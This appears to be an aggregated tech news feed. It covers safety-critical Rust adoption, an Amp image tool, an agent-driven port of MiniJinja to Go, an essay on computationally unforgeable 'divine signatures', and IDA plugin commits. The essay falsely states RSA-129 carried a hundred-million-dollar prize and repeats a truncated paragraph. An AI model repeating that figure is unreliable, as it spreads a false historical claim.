"In aerospace there's a notion of we must own all the code ourselves. We must have control of every single line of code." -- Engineering lead in aerospace
This is the first big takeaway: a lot of "Rust in safety-critical" is not just about whether Rust compiles for a target. It is about whether teams can assemble an evidence-friendly software stack and keep it stable over long product lifetimes.
The compiler is doing work teams used to do elsewhere
Many interviewees framed Rust's value in terms of work shifted earlier and made more repeatable by the compiler. This is not just "nice"; it changes how much manual review you can realistically afford. Much of what was historically process-based enforcement through coding standards like MISRA C and CERT C becomes a language-level concern in Rust, checked by the compiler rather than external static analysis or manual review.
"Roughly 90% of what we used to check with external tools is built into Rust's compiler." -- Principal Firmware Engineer (mobile robotics)
We heard variations of this from teams dealing with large codebases and varied skill levels:
"We cannot control the skill of developers from end to end. We have to check the code quality. Rust by checking at compile time, or Clippy tools, is very useful for our domain." -- Engineer at a major automaker
Even on smaller teams, the review load matters:
"I usually tend to work on teams between five and eight. Even so, it's too much code. I feel confident moving faster, a certain class of flaws that you aren't worrying about." -- Embedded systems engineer (mobile robotics)
Closely related: people repeatedly highlighted Rust's consistency around error handling:
"Having a single accepted way of handling errors used throughout the ecosystem is something that Rust did completely right." -- Automotive Technical Lead
For teams building products with 15-to-20-year lifetimes and "teams of teams," compiler-enforced invariants scale better than "we will just review harder."
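For readers who have not seen it, the "single accepted way of handling errors" looks roughly like the sketch below; the error type and function are invented for illustration:

```rust
// Illustrative only: a typed error enum plus `Result`, the pattern the
// interviewees describe as consistent across the ecosystem.
#[derive(Debug)]
enum SensorError {
    OutOfRange { raw: u16 },
    NotCalibrated,
}

fn scale_reading(raw: u16, calibrated: bool) -> Result<f32, SensorError> {
    if !calibrated {
        return Err(SensorError::NotCalibrated);
    }
    if raw > 4095 {
        return Err(SensorError::OutOfRange { raw });
    }
    Ok(raw as f32 / 4095.0)
}

fn main() {
    // The caller is forced by the compiler to acknowledge the failure path;
    // there is no silently ignored return code for a reviewer to catch.
    match scale_reading(5000, true) {
        Ok(value) => println!("scaled: {value}"),
        Err(err) => eprintln!("rejected reading: {err:?}"),
    }
}
```

The failure path is part of the type signature, so ignoring it is a compile-time event rather than a review finding.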
Teams want newer compilers, but also stability they can explain
A common pattern in safety-critical environments is conservative toolchain selection. But engineers pointed out a tension: older toolchains carry their own defect history.
"[..] traditional wisdom is that after something's been around and gone through motions / testing then considered more stable and safer [..] older compilers used tend to have more bugs [and they become] hard to justify" -- Software Engineer at an Automotive supplier
Rust's edition system was described as a real advantage here, especially for incremental migration strategies that are common in automotive programs:
"[The edition system is] golden for automotive, where incremental migration is essential." -- Software Engineer at major Automaker
In practice, "stability" is also about managing the mismatch between what the platform supports and what the ecosystem expects. Teams described pinning Rust versions, then fighting dependency drift:
"We can pin the Rust toolchain, but because almost all crates are implemented for the latest versions, we have to downgrade. It's very time- consuming." -- Engineer at a major automaker
For safety-critical adoption, "stability" is operational. Teams need to answer questions like: What does a Rust upgrade change, and what does it not change? What are the bounds on migration work? How do we demonstrate we have managed upgrade risk?
Target support matters in practical ways
Safety-critical software often runs on long-lived platforms and RTOSs. Even when "support exists," there can be caveats. Teams described friction around targets like QNX, where upstream Rust support exists but with limitations (for example, QNX 8.0 support is currently `no_std` only).2 This connects to Rust's target tier policy: the policy itself is clear, but regulated teams still need to map "tier" to "what can I responsibly bet on for this platform and this product lifetime."
"I had experiences where all of a sudden I was upgrading the compiler and my toolchain and dependencies didn't work anymore for the Tier 3 target we're using. That's simply not acceptable. If you want to invest in some technology, you want to have a certain reliability." -- Senior software engineer at a major automaker
`core` is the spine, and it sets expectations
In `no_std` environments, `core` becomes the spine of Rust. Teams described it as both rich enough to build real products and small enough to audit. A lot of Rust's safety leverage lives there: `Option` and `Result`, slices, iterators, `Cell` and `RefCell`, atomics, `MaybeUninit`, `Pin`. But we also heard a consistent shape of gaps: many embedded and safety-critical projects want `no_std`-friendly building blocks (fixed-size collections, queues) and predictable math primitives, but do not want to rely on "just any" third-party crate at higher integrity levels.
"Most of the math library stuff is not in core, it's in std. Sin, cosine... the workaround for now has been the libm crate. It'd be nice if it was in core." -- Principal Firmware Engineer (mobile robotics)
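As a rough illustration of the "building blocks" gap on the collections side, here is a minimal library-style `no_std` sketch that leans only on `core`; the type is hypothetical, not a proposal for the standard library:

```rust
// lib.rs of a hypothetical no_std support crate: a fixed-capacity queue
// with no heap, no panicking paths, and no third-party dependencies.
#![no_std]

pub struct FixedQueue<const N: usize> {
    buf: [Option<u32>; N],
    head: usize,
    len: usize,
}

impl<const N: usize> FixedQueue<N> {
    pub const fn new() -> Self {
        Self { buf: [None; N], head: 0, len: 0 }
    }

    /// A full queue reports an error instead of allocating or panicking,
    /// so the failure mode stays visible to the caller.
    pub fn push(&mut self, value: u32) -> Result<(), u32> {
        if self.len == N {
            return Err(value);
        }
        let tail = (self.head + self.len) % N;
        self.buf[tail] = Some(value);
        self.len += 1;
        Ok(())
    }

    pub fn pop(&mut self) -> Option<u32> {
        if self.len == 0 {
            return None;
        }
        let value = self.buf[self.head].take();
        self.head = (self.head + 1) % N;
        self.len -= 1;
        value
    }
}
```

Nothing here allocates, and the capacity is part of the type, which is the shape teams said they want to be able to audit at higher integrity levels.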
Async is appealing, but the long-run story is not settled
Some safety-critical-adjacent systems are already heavily asynchronous: daemons, middleware frameworks, event-driven architectures. That makes Rust's async story interesting.
But people also expressed uncertainty about ecosystem lock-in and what it would take to use async in higher-criticality components. One team lead developing middleware told us:
"We're not sure how async will work out in the long-run [in Rust for safety- critical]. [..] A lot of our software is highly asynchronous and a lot of our daemons in the AUTOSAR Adaptive Platform world are basically following a reactor pattern. [..] [C++14] doesn't really support these concepts, so some of this is lack of familiarity." -- Team lead at an automotive software company developing middleware in Rust
And when teams look at async through an ISO 26262 lens, the runtime question shows up immediately:
"If we want to make use of async Rust, of course you need some runtime which is providing this with all the quality artifacts and process artifacts for ISO 26262." -- Team lead at an automotive software company developing middleware in Rust
Async is not "just a language feature" in safety-critical contexts. It pulls in runtime choices, scheduling assumptions, and, at higher integrity levels, the question of what it would mean to certify or qualify the relevant parts of the stack.
Recommendations
Find ways to help the safety-critical community support their own needs. Open source helps those who help themselves. The Ferrocene Language Specification (FLS) shows this working well: it started as an industry effort to create a specification suitable for safety-qualification of the Rust compiler, companies invested in the work, and it now has a sustainable home under the Rust Project with a team actively maintaining it.3
Contrast this with MC/DC coverage support in rustc. Earlier efforts stalled due to lack of sustained engagement from safety-critical companies.4 The technical work was there, but without industry involvement to help define requirements, validate the implementation, and commit to maintaining it, the effort lost momentum. A major concern was that the MC/DC code added maintenance burden to the rest of the coverage infrastructure without a clear owner. Now in 2026, there is renewed interest in doing this the right way: companies are working through the Safety-Critical Rust Consortium to create a Rust Project Goal in 2026 to collaborate with the Rust Project on MC/DC support. The model is shared ownership of requirements, with primary implementation and maintenance done by companies with a vested interest in safety-critical, done in a way that does not impede maintenance of the rest of the coverage code.
The remaining recommendations follow this pattern: the Safety-Critical Rust Consortium can help the community organize requirements and drive work, with the Rust Project providing the deep technical knowledge of Rust Project artifacts needed for successful collaboration. The path works when both sides show up.
Establish ecosystem-wide MSRV conventions. The dependency drift problem is real: teams pin their Rust toolchain for stability, but crates targeting the latest compiler make this difficult to sustain. An LTS release scheme, combined with encouraging libraries to maintain MSRV compatibility with LTS releases, could reduce this friction. This would require coordination between the Rust Project (potentially the release team) and the broader ecosystem, with the Safety-Critical Rust Consortium helping to articulate requirements and adoption patterns.
Turn "target tier policy" into a safety-critical onramp. The friction we heard is not about the policy being unclear, it is about translating "tier" into practical decisions. A short, target-focused readiness checklist would help: Which targets exist? Which ones are
no_stdonly? What is the last known tested OS version? What are the top blockers? The raw ingredients exist in rustc docs, release notes, and issue trackers, but pulling them together in one place would lower the barrier. Clearer, consolidated information also makes it easier for teams who depend on specific targets to contribute to maintaining them. The Safety-Critical Rust Consortium could lead this effort, working with compiler team members and platform maintainers to keep the information accurate.Document "dependency lifecycle" patterns teams are already using. The QM story is often: use crates early, track carefully, shrink dependencies for higher-criticality parts. The ASIL B+ story is often: avoid third-party crates entirely, or use abstraction layers and plan to replace later. Turning those patterns into a reusable playbook would help new teams make the same moves with less trial and error. This seems like a natural fit for the Safety- Critical Rust Consortium's liaison work.
Define requirements for a safety-case friendly async runtime. Teams adopting async in safety-critical contexts need runtimes with appropriate quality and process artifacts for standards like ISO 26262. Work is already happening in this space.5 The Safety-Critical Rust Consortium could lead the effort to define what "safety-case friendly" means in concrete terms, working with the async working group and libs team on technical feasibility and design.
Treat interop as part of the safety story. Many teams are not going to rewrite their world in Rust. They are going to integrate Rust into existing C and C++ systems and carry that boundary for years. Guidance and tooling to keep interfaces correct, auditable, and in sync would help. The compiler team and lang team could consider how FFI boundaries are surfaced and checked, informed by requirements gathered through the Safety-Critical Rust Consortium.
"We rely very heavily on FFI compatibility between C, C++, and Rust. In a safety-critical space, that's where the difficulty ends up being, generating bindings, finding out what the problem was." -- Embedded systems engineer (mobile robotics)
Conclusion
To sum up the main points in this post:
- Rust is already deployed in production for safety-critical systems, including mobile robotics (IEC 61508 SIL 2) and medical devices (IEC 62304 Class B). The path exists.
- Rust's defaults (memory safety, thread safety, strong typing) map directly to much of what Functional Safety Engineers spend their time preventing. But ecosystem support thins out as you move toward higher-criticality software.
- At low criticality (QM), teams use crates freely and harden later. At higher levels (ASIL B+), third-party dependencies become difficult to justify, and teams rewrite, internalize, or build abstraction layers for future replacement.
- The compiler is doing work that used to require external tools and manual review. Much of what was historically process-based enforcement through standards like MISRA C and CERT C becomes a language-level concern, checked by the compiler. That can scale better than "review harder" for long-lived products with large teams and supports engineers in these domains feeling more secure in the systems they ship.
- Stability is operational: teams need to explain what upgrades change, manage dependency drift, and map target tier policies to their platform reality.
- Async is appealing for middleware and event-driven systems, but the runtime and qualification story is not settled for higher-criticality use.
We make six recommendations: find ways to help the safety-critical community support their own needs, establish ecosystem-wide MSRV conventions, create target-focused readiness checklists, document dependency lifecycle patterns, define requirements for safety-case friendly async runtimes, and treat C/C++ interop as part of the safety story.
Get involved
If you're working in safety-critical Rust, or you want to help make it easier, check out the Rust Foundation's Safety-Critical Rust Consortium and the in-progress Safety-Critical Rust coding guidelines.
Hearing concrete constraints, examples of assessor feedback, and what "evidence" actually looks like in practice is incredibly helpful. The goal is to make Rust's strengths more accessible in environments where correctness and safety are not optional.
1. If you're curious about how rigor scales with cost in ISO 26262, this Feabhas guide gives a good high-level overview.
2. See the QNX target documentation for current status.
3. The FLS team was created under the Rust Project in 2025. The team is now actively maintaining the specification, reviewing changes and keeping the FLS in sync with language evolution.
4. See the MC/DC tracking issue for context. The initial implementation was removed due to maintenance concerns.
5. Eclipse SDV's Eclipse S-CORE project includes an Orchestrator written in Rust for their async runtime, aimed at safety-critical automotive software.
-
🔗 Ampcode News Painter rss
Amp can now generate and edit images, which is useful for design inspiration, tweaking mockups, and making visual assets:
Exploring UI alternatives: "show me 3 different designs for this task dashboard"
Editing an existing image: "update this dashboard with the changes shown in the attached image"
To use it, ask Amp to use the `painter` tool explicitly. The painter uses Gemini 3 Pro Image (a.k.a. Nano Banana Pro) under the hood. -
🔗 Armin Ronacher Porting MiniJinja to Go With an Agent rss
Turns out you can just port things now. I already attempted this experiment in the summer, but it turned out to be a bit too much for what I had time for. However, things have advanced since. Yesterday I ported MiniJinja (a Rust Jinja2 template engine) to native Go, and I used an agent to do pretty much all of the work. In fact, I barely did anything beyond giving some high-level guidance on how I thought it could be accomplished.
In total I probably spent around 45 minutes actively with it. It worked for around 3 hours while I was watching, then another 7 hours alone. This post is a recollection of what happened and what I learned from it.
All prompting was done by voice using pi, starting with Opus 4.5 and switching to GPT-5.2 Codex for the long tail of test fixing.
What is MiniJinja
MiniJinja is a re-implementation of Jinja2 for Rust. I originally wrote it because I wanted to do an infrastructure automation project in Rust and Jinja was popular for that. The original project didn't go anywhere, but MiniJinja itself continued being useful for both me and other users.
The way MiniJinja is tested is with snapshot tests: inputs and expected outputs, using insta to verify they match. These snapshot tests were what I wanted to use to validate the Go port.
Test-Driven Porting
My initial prompt asked the agent to figure out how to validate the port. Through that conversation, the agent and I aligned on a path: reuse the existing Rust snapshot tests and port incrementally (lexer -> parser -> runtime).
This meant the agent built Go-side tooling to:
- Parse Rust's test input files (which embed settings as JSON headers).
- Parse the reference insta `.snap` snapshots and compare output.
- Maintain a skip-list to temporarily opt out of failing tests.
This resulted in a pretty good harness with a tight feedback loop. The agent had a clear goal (make everything pass) and a progression (lexer -> parser -> runtime). The tight feedback loop mattered particularly at the end where it was about getting details right. Every missing behavior had one or more failing snapshots.
Branching in Pi
I used Pi's branching feature to structure the session into phases. I rewound to earlier parts of the session and used the branch-switch feature to automatically tell the agent what it had already done. This is similar to compaction, but Pi shows me what it puts into the context. When Pi switches branches it does two things:
- It stays in the same session so I can navigate around, but it makes a new branch off an earlier message.
- When switching, it adds a summary of what it did as a priming message into where it branched off. I found this quite helpful to avoid the agent doing vision quests from scratch to figure out how far it had already gotten.
Without switching branches, I would probably just make new sessions and have more plan files lying around or use something like Amp's handoff feature which also allows the agent to consult earlier conversations if it needs more information.
First Signs of Divergence
What was interesting is that the agent went from literal porting to behavioral porting quite quickly. I didn't steer it away from this as long as the behavior aligned. I let it do this for a few reasons. First, the code base isn't that large, so I felt I could make adjustments at the end if needed. Letting the agent continue with what was already working felt like the right strategy. Second, it was aligning to idiomatic Go much better this way.
For instance, on the runtime it implemented a tree-walking interpreter (not a bytecode interpreter like Rust) and it decided to use Go's reflection for the value type. I didn't tell it to do either of these things, but they made more sense than replicating my Rust interpreter design, which was partly motivated by not having a garbage collector or runtime type information.
Where I Had to Push Back
On the other hand, the agent made some changes while making tests pass that I disagreed with. It completely gave up on all the "must fail" tests because the error messages were impossible to replicate perfectly given the runtime differences. So I had to steer it towards fuzzy matching instead.
It also wanted to regress behavior I wanted to retain (e.g., exact HTML escaping semantics, or that `range` must return an iterator). I think if I hadn't steered it there, it might not have made it to completion without going down problematic paths, or I would have lost confidence in the result.
Grinding to Full Coverage
Once the major semantic mismatches were fixed, the remaining work was filling in all missing pieces: missing filters and test functions, loop extras, macros, call blocks, etc. Since I wanted to go to bed, I switched to Codex 5.2 and queued up a few "continue making all tests pass if they are not passing yet" prompts, then let it work through compaction. I felt confident enough that the agent could make the rest of the tests pass without guidance once it had the basics covered.
This phase ran without supervision overnight.
Final Cleanup
After functional convergence, I asked the agent to document internal functions and reorganize (like moving filters to a separate file). I also asked it to document all functions and filters like in the Rust code base. This was also when I set up CI, release processes, and talked through what was created to come up with some finalizing touches before merging.
Parting Thoughts
There are a few things I find interesting here.
First: these types of ports are possible now. I know porting was already possible for many months, but it required much more attention. This changes some dynamics. I feel less like technology choices are constrained by ecosystem lock-in. Sure, porting NumPy to Go would be a more involved undertaking, and getting it competitive even more so (years of optimizations in there). But still, it feels like many more libraries can be used now.
Second: for me, the value is shifting from the code to the tests and documentation. A good test suite might actually be worth more than the code. That said, this isn't an argument for keeping tests secret -- generating tests with good coverage is also getting easier. However, for keeping code bases in different languages in sync, you need to agree on shared tests, otherwise divergence is inevitable.
Lastly, there's the social dynamic. Once, having people port your code to other languages was something to take pride in. It was a sign of accomplishment -- a project was "cool enough" that someone put time into making it available elsewhere. With agents, it doesn't invoke the same feelings. Will McGugan also called out this change.
Session Stats
Lastly, some boring stats for the main session:
- Agent run duration: ~10 hours (~3 hours supervised)
- Active human time: ~45 minutes
- Total messages: 2,698
- My prompts: 34
- Tool calls: 1,386
- Raw API token cost: $60
- Total tokens: 2.2 million
- Models: `claude-opus-4-5`, and `gpt-5.2-codex` for the unattended overnight run
These numbers do not include the later addition of doc strings and smaller fixups.
-
🔗 Stephen Diehl Hypothetical Divine Signatures rss
Hypothetical Divine Signatures
The author of the Epistle to the Hebrews famously claimed that "faith is the substance of things hoped for, the evidence of things not seen," which was a perfectly serviceable theological patch for an era where the average person’s greatest computational challenge was counting their own fingers. However, in an age where we can simulate galaxies and sequence genomes, "I’m God, trust me bro" is not a particularly compelling argument to the modern mind, unlike our goat-herding ancestors who were easily impressed by a well-timed solar eclipse or a particularly loud bush. If a truly omniscient entity wanted to establish a "scientific secular covenant" with a technological species, it would not rely on subjective feelings or ambiguous dreams. It would instead provide a Divine Signature through the cold, hard lens of computational complexity: a set of claims that are succinct enough to be carved into a stone tablet but so mathematically dense that finding them would require more energy than exists in the observable universe.
To move beyond mere storytelling and into the realm of objective proof, a text must demonstrate that it has bypassed Bremermann's Limit, the physical threshold for the maximum computational speed of any self-contained system in the material universe. This limit, derived from Einstein's mass-energy equivalence and the Heisenberg uncertainty principle, is approximately \( c^2/h \approx 1.36 \times 10^{50} \) bits per second per kilogram. The "soft" version of this limit considers a computer the mass of the Earth running for billions of years; the "strong" version considers harnessing every atom and cubic meter of space in the observable universe until heat death. By providing answers to problems that exceed even the strong limit, a "divine" author proves they are operating from a platform that exists outside our localized entropy and processing constraints, effectively signing their work with a flourish that no amount of ingenuity or effort could forge.
Personally, I hold no supernatural beliefs, and I am serenely indifferent to those who do. But a good hypothesis must be falsifiable, and intellectual honesty requires stating what evidence would change my mind. A verified divine signature of this kind would do exactly that. I would naturally default to material explanations until they were exhausted, but the exercise demonstrates that materialism is not unfalsifiable dogma; one can articulate the precise circumstances under which it would fall.
The Divine Factorization. A prophetic verse might read: "Behold the great number \( N \), whose length is as twenty thousand digits; it is born of the union of \( P \) and \( Q \), and none other shall divide it." This obviously refers to the Integer Factorization Problem. Twenty thousand digits is not even that much text; it is considerably shorter than the "begots" documenting forty generations of Levantine shepherds. While multiplying two primes to get a 20,000-digit semiprime is a simple operation, reversing the process is effectively intractable. For example, RSA-129 was published in 1977 with a one hundred million dollar prize and remained unfactored for 17 years:
$$114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541$$
$$= 3490529510847650949147849619903898133417764638493387843990820577$$
$$\times \ 32769132993266709549961988190834461413177642967992942539798288533$$
At only 129 digits, this took a massive distributed computing effort in 1994. A 20,000-digit semiprime is in another universe entirely. Under the General Number Field Sieve, the clock cycles required to factor a 20,000-digit number would exceed the total available energy in the observable universe. It is a thermodynamic wall that cannot be breached by any bounded intelligence without infinite time. For us, verification is trivial; we simply multiply the two provided numbers together to see if they match \( N \), a task a standard smartphone can complete in a fraction of a second.
The Ramsey Revelation. The scripture would proclaim: "If ten brethren and ten strangers be gathered in a hall of souls, there shall surely be a clique of ten or a desert of ten; behold the map of their connections." This addresses the Constructive Lower Bound of Ramsey Numbers, denoted as \( R(r, s) \). The known diagonal Ramsey numbers are:
$$R(3,3) = 6, \quad R(4,4) = 18, \quad R(5,5) = 43\text{--}48, \quad R(6,6) = 102\text{--}165, \quad \ldots$$
We cannot even pin down \( R(5, 5) \) to an exact value; it is famously "impossible" to compute because the combinations grow too fast. Providing the exact value for \( R(10, 10) \) along with a specific graph coloring that avoids a clique of size 10 is succinct to state but requires navigating a search space that is thermodynamically inaccessible to our universe. To put this in perspective: the number of ways to two-color the edges of a graph with 1,000 nodes is \( 2^{499,500} \), while the number of atoms in the observable universe is roughly \( 2^{266} \). The search space is mathematically larger than any physical computer could ever process. We verify one graph; the author had to search all of them. Finding a specific "needle" graph in this haystack is a rational proof of super-universal processing power. Verification is straightforward for us because we can simply run a script to scan the provided adjacency matrix to confirm no group of 10 nodes exists where every edge is the same color, which is a polynomial time operation \( O(n^{10}) \) that is easily handled by modern hardware.
The Circle's Secret Checksum. The text would command: "Search the circle's measure at the position of \( 10^{80} \) and there find a thousand zeros followed by the message of the stars." This utilizes the Bailey–Borwein–Plouffe (BBP) algorithm, which allows us to calculate the \( n^{th} \) digit of \( \pi \) in base-16 without calculating the preceding digits:
$$\pi = \sum_{k=0}^{\infty} \frac{1}{16^k} \left( \frac{4}{8k+1} - \frac{2}{8k+4} - \frac{1}{8k+5} - \frac{1}{8k+6} \right)$$
We cannot currently scan \( \pi \) out to \( 10^{80} \) to find interesting patterns, and the information entropy of \( \pi \) suggests that such a massive, low-entropy anomaly at a coordinate equal to the number of atoms in the universe is statistically impossible to occur by chance. If the text successfully predicts a thousand zeros at a specific, distant coordinate, it implies the author did not "scan" for it but rather created the fundamental constants of mathematics itself, or possesses infinite foreknowledge of the structure of irrational numbers. This was, incidentally, a plot point in Carl Sagan's novel Contact, where a message hidden deep in the digits of \( \pi \) serves as a signature from the architects of the universe. While calculating the digit at \( 10^{80} \) is a massive task, it is technically feasible for a global distributed network. We verify this by running the BBP algorithm to check that specific "address," confirming the anomaly without needing to solve the entire constant.
The End of Euler's Dream. The prophet would say: "Though twelve powers of twelve seem to need their kind, search for the eleven that equal the one; find them at these integers." This targets the Smallest Counter-example to Euler's Sum of Powers Conjecture, which posits that you need \( n \) \( n^{th} \) powers to sum to another \( n^{th} \) power:
$$\sum_{i=1}^{k} a_i^n = b^n \implies k \geq n$$
While humans found counter-examples for \( n=4 \) and \( n=5 \) after centuries of searching, providing a solution for \( n=12 \) would be a needle-in-a-haystack problem of cosmic proportions. This is essentially a search through a Diophantine space that is effectively infinite. We verify the claim easily by plugging the provided integers into a high-precision calculator and confirming the left side of the equation perfectly equals the right, transforming a massive search problem into a simple arithmetic check.
The Busy Beaver's Rest. A prophetic verse might say: "Consider the machine of twenty states, simple in its ways; it shall toil for exactly \( X \) steps and then find its rest, and no man shall count the days of its labor." This is the Busy Beaver Function, \( BB(n) \), the final boss of computer science. Because it effectively solves the Halting Problem, no general algorithm exists to calculate these values; they are mathematically uncomputable. Humanity has, with heroic effort, managed to prove values only for the smallest machines:
$$BB(1) = 1, \quad BB(2) = 6, \quad BB(3) = 21, \quad BB(4) = 107, \quad BB(5) = 47176870, \quad \ldots$$
Beyond five states, the function explodes beyond comprehension; \( BB(6) \) is known to exceed \( 10 \uparrow\uparrow 15 \), a tower of 15 tens. Stating the exact halting time for a 20-state Turing machine is a God-level flex because it implies the author bypassed the logical impossibility of the Halting Problem itself. Verification is as simple as simulating the specific machine described and counting its steps until it halts, which requires zero creative mathematics or algorithmic breakthroughs on our part.
The Kissing of Spheres. The scripture would read: "In a realm of an hundred depths, where spheres are gathered like grapes, exactly \( X \) shall press against the heart of the center." This refers to the Kissing Number problem: how many non-overlapping spheres can touch a central sphere of the same size? In three dimensions, the answer is 12, which is easy enough to visualize over a drink. In 8 dimensions, the answer is 240. In 24 dimensions, it is 196,560, thanks to the elegant structure of the Leech Lattice. But beyond 24 dimensions, we lack these lattice optimizations that make the math manageable. In 100 dimensions, the symmetry is so complex that our best supercomputers can only give us a vague range. The number of possible configurations for non-overlapping spheres explodes into a combinatorial nightmare, and determining the exact maximum requires navigating a high-dimensional search space so vast that even an advanced intelligence utilizing quantum annealing would likely settle on a local maximum rather than the true global optimum. Providing the exact integer would reveal a perfect mastery of high-dimensional space, the kind of insight that suggests the author is comfortable navigating 100-dimensional manifolds like they were a simple game of marbles. We verify the result by checking the provided coordinates of the spheres to ensure the distance between any two sphere centers satisfies:
$$\text{dist}(c_i, c_j) \geq 2$$
while each satisfies \( \text{dist}(c_i, \text{origin}) = 2 \), which is basic linear algebra.
The Titan of Primes. The text might state: "The millionth prime of the form \( 2^p - 1 \) shall be found when \( p \) is this specific titan of a number." This identifies a "deep" Mersenne Prime, \( M_p = 2^p - 1 \). So far we have found only about 50 of these primes, using global distributed computing networks like GIMPS:
$$p_5 = 13, \quad p_{10} = 89, \quad p_{20} = 4423, \quad p_{30} = 132049, \quad p_{40} = 20996011, \quad p_{51} = 82589933, \quad \ldots$$
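As an aside on how lopsided the search/verify asymmetry is, here is a minimal sketch of the Lucas-Lehmer check discussed just below, assuming the `num-bigint` and `num-traits` crates (which the essay itself does not mention):

```rust
// Sketch only: verifying a claimed Mersenne prime exponent with the
// Lucas-Lehmer test.
use num_bigint::BigUint;
use num_traits::{One, Zero};

/// For an odd prime exponent p, M_p = 2^p - 1 is prime iff s == 0 after
/// p - 2 iterations of s <- s^2 - 2 (mod M_p), starting from s = 4.
fn is_mersenne_prime(p: u32) -> bool {
    let m = (BigUint::one() << (p as usize)) - BigUint::one();
    let mut s = BigUint::from(4u32);
    for _ in 0..p.saturating_sub(2) {
        // Add m before subtracting 2 so the intermediate value never underflows.
        s = (&s * &s + &m - BigUint::from(2u32)) % &m;
    }
    s.is_zero()
}

fn main() {
    // Exponents taken from the list above: all should print `true`.
    for p in [13u32, 89, 4423] {
        println!("2^{p} - 1 prime: {}", is_mersenne_prime(p));
    }
}
```

Checking a claimed exponent is a single deterministic loop; finding the millionth such exponent is the part that needs the "God's-eye view."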
providing a "Distant" Mersenne Prime Exponent for the millionth one would be providing a password to the secret architecture of the number line. Finding it requires a "God’s-eye view" of prime distribution that likely requires a proof of the Riemann Hypothesis. Verification is quite efficient for us; we simply run the Lucas-Lehmer test on the provided exponent, which is a deterministic and well-understood primality test.The Skewes' Crossing. The text would proclaim: "Though the shadows of the primes seem ever fewer than the curve of the law, they shall rise up and exceed it at the count of this massive power tower." In analytic number theory, we know the actual count of primes \( \pi(x) \) eventually exceeds the logarithmic integral estimate \( li(x) \) (defined as \( \int_{2}^{x} \frac{dt}{\ln t} \), the "expected" number of primes up to \( x \)), but this Skewes' Number crossing occurs at such a staggering distance on the number line (originally estimated at \( 10^{10^{10^{34}}} \)) that it is effectively invisible to direct observation. This number is so deep into the number line that the observable universe is not large enough to write down its digits in standard form; you must use power towers. An entity pointing to a specific exception to a universal rule at such a distance is demonstrating a "God's eye view" of the entire number line simultaneously. To identify the exact integer of the first crossing requires a perfect knowledge of the distribution of the zeros of the Riemann Zeta function. We can verify the claim by evaluating \( \pi(x) \) using the Meissel-Lehmer algorithm and confirming that at the provided crossing point:
$$\pi(x) > li(x) \quad \text{for the first time}$$
The Diophantine Key. The text would say: "Three cubes shall be gathered, and their sum shall be forty-two; seek them among the numbers of seventeen digits, and there find the truth." Humans did find the solution for sums of three cubes with \( k=42 \) in 2019, using a planetary-scale computer network:
$$42 = (-80538738812075974)^3 + 80435758145817515^3 + 12602123297335631^3$$
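Just to underline how cheap the verification side is, a minimal sketch (assuming the `num-bigint` crate, an assumption of this illustration rather than something the essay specifies) that checks the identity above:

```rust
// Sketch only: confirm the published three-cubes decomposition of 42.
use num_bigint::BigInt;

fn main() {
    let a = BigInt::parse_bytes(b"-80538738812075974", 10).unwrap();
    let b = BigInt::parse_bytes(b"80435758145817515", 10).unwrap();
    let c = BigInt::parse_bytes(b"12602123297335631", 10).unwrap();

    // Cube by repeated multiplication to stay within well-known APIs.
    let sum = &a * &a * &a + &b * &b * &b + &c * &c * &c;
    assert_eq!(sum, BigInt::from(42));
    println!("verified: a^3 + b^3 + c^3 = {sum}");
}
```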
providing a solution for a much more complex equation moves the problem into the realm of Hilbert's Tenth Problem. Because this problem is generally undecidable, there is no "method" to solve it; you cannot write a program to solve all Diophantine equations. Finding a solution to a sufficiently complex one implies the ability to look through the infinite set of integers and "pick out" the needle. A divine solution transcends mere calculation; it is an insight into an undecidable space, suggesting the author is unbound by the Halting Problem. Verification is the definition of trivial; we cube the three provided integers, add them together, and see if the sum equals the target constant.Of course, no existing religious text actually does this. They mostly focus on the really important issues of existence like who you can bang or what type of cheese you can put on meat. Which were very human concerns that do not require much more than a Bronze Age imagination. One would think that a divine entity with infinite knowledge and infinite (computational) power would want to leave a signature that actually scales with the intelligence of the species it created. Providing a succinct, verifiable, but computationally impossible result would be the only way to satisfy a scientific secular framework. The fact that we have found plenty of rules about shellfish but zero 20,000-digit prime factors suggests that if there is a Great Programmer in the sky, they are either very shy or they simply forgot to
Of course, no existing religious text actually does this. They mostly focus on the really important issues of existence, like who you can bang or what type of cheese you can put on meat: very human concerns that require little more than a Bronze Age imagination. One would think that a divine entity with infinite knowledge and infinite (computational) power would want to leave a signature that actually scales with the intelligence of the species it created. Providing a succinct, verifiable, but computationally impossible result would be the only way to satisfy a scientific, secular framework. The fact that we have found plenty of rules about shellfish but zero 20,000-digit prime factors suggests that, if there is a Great Programmer in the sky, they are either very shy or they simply forgot to `git add README.md` in the final build.
-
- January 13, 2026
-
🔗 IDA Plugin Updates IDA Plugin Updates on 2026-01-13 rss
IDA Plugin Updates on 2026-01-13
New Releases:
- ida-chat-plugin v0.2.4
- ida-chat-plugin v0.2.3
- ida-chat-plugin v0.2.2
- ida-chat-plugin v0.2.1
- ida-chat-plugin v0.2.0 - Panel docking improvements
- ida-domain v0.3.6-dev.3
- ida-hcli v0.15.8
- ida-hcli v0.15.7
- ida-hcli v0.15.6
- ida-hcli v0.15.5
Activity:
- capa
- 6ad4fbbb: Merge pull request #2742 from mandiant/idalib-tests
- 8105214d: build(deps-dev): bump build from 1.3.0 to 1.4.0 (#2809)
- d1fc8446: pyproject: ida: silence SWIG related warnings from IDA bindings
- 0686305f: ida: loader: load resource sections to help discovery of embedded files
- 8d6b878e: ida: fix return value from open_database
- 3646fcef: ida: helpers: refactor discovery of alternative names
- ce67d99e: ida: skip function-name features for default names (sub_*)
- c89871f2: ci: pin setup-uv
- 03cc901f: tests: idalib: xfail resource test on 9.0
- 412ab62c: ida: pep8
- f72bd49a: ci: enable testing of IDA 9.0
- 1d561bd0: tests: idalib: xfail two tests on 9.0 and 9.1
- c5808c4c: tests: idalib: use 9.1 instead of 9.0 as min ver
- 200c8037: tests: fix logging message
- 4fb6ac0d: add ida version to test matrix name
- 87fb96d0: load resource for test sample
- e1fd1848: ida: function: extract function name
- 82be20be: loader: idalib: disable lumina
- 132e64a9: tests: idalib: better detect missing idapro package
- 9c6db007: ci: add configuration for idalib tests
- cpp03
- decode_instruction
- ca99ff19: Fix email format in authors section of ida-plugin.json
- ghidra
- ba6cc4a4: Merge remote-tracking branch 'origin/patch'
- c38915eb: Merge remote-tracking branch 'origin/GP-6284_ryanmkurtz_wheels' into …
- 6208df2d: GP-1 Corrected RISCV import opinion file
